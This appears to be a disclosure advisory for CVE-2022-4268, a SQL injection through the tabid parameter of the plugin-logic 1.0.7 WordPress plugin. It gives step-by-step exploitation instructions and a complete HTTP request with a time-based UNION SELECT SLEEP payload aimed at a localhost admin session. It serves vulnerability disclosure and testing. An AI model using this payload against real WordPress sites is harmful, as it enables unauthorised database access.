plugin-logic 1.0.7 WordPress plug-in SQL injection

Vulnerability Metadata

Key Value
Date of Disclosure December 02 2022
Affected Software plugin-logic
Affected Software Type WordPress plugin
Version 1.0.7
Weakness SQL Injection
CVE ID CVE-2022-4268
CVSS 3.x Base Score n/a
CVSS 2.0 Base Score n/a
Reporter Kunal Sharma, Daniel Krohmer
Reporter Contact
Link to Affected Software
Link to Vulnerability DB

Vulnerability Description

The tabid GET query parameter in plugin-logic 1.0.7 is vulnerable to SQL injection. An authenticated attacker may abuse the fetch active plugins functionality in plulo_option_page function inside plugin-logic.php. This leads to a threat actor in a multisite setup crafting a malicious GET request.

Exploitation Guide

Login as admin user. This attack requires at least admin privileges. Note: The plugin should be installed in a multisite network.


Go to PLugin Logic under Plugins option on the WordPress site dashboard.


Click Save Changes on any tab.


Clicking this button triggers the vulnerable request. We have to add an additional GET query parametertabid in the request.


A POC may look like the following request:


In the code, the vulnerability is triggered by un-sanitized user input of tabid at line 203 in ./plugin-logic.php.


At lines 213-216 in ./plugin-logic.php the database query call on $selected_blog leads to SQL injection.


Exploit Payload

Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.

The SQL injection can be triggered by sending the request below:

POST /wp-admin/network/plugins.php?page=plugin-logic&tabid=options%2bunion%2bSELECT%2bSLEEP(6)%3b%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/network/plugins.php?page=plugin-logic
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
Origin: http://localhost
Connection: close
Cookie: wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1666185599; wp-settings-8=libraryContent%3Dbrowse; wp-settings-time-8=1666389039; wordpress_test_cookie=WP%20Cookie%20check; wordpress_c9db569cb388e160e4b86ca1ddff84d7=newadmin%7C1666566701%7COfIsPG6DZPN1yTZcYsQ9O8Co7ADOvG6nne9kO5iGtqs%7C0abf94c1e22528cf048ff22b03d79223ba73c502056deb9a9ce748fa0c03b2c0; wordpress_logged_in_c9db569cb388e160e4b86ca1ddff84d7=newadmin%7C1666566701%7COfIsPG6DZPN1yTZcYsQ9O8Co7ADOvG6nne9kO5iGtqs%7C9bf5c239139b198a8856c9927f2cf4835b8583556b6e07b6270ec1284a59f953
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1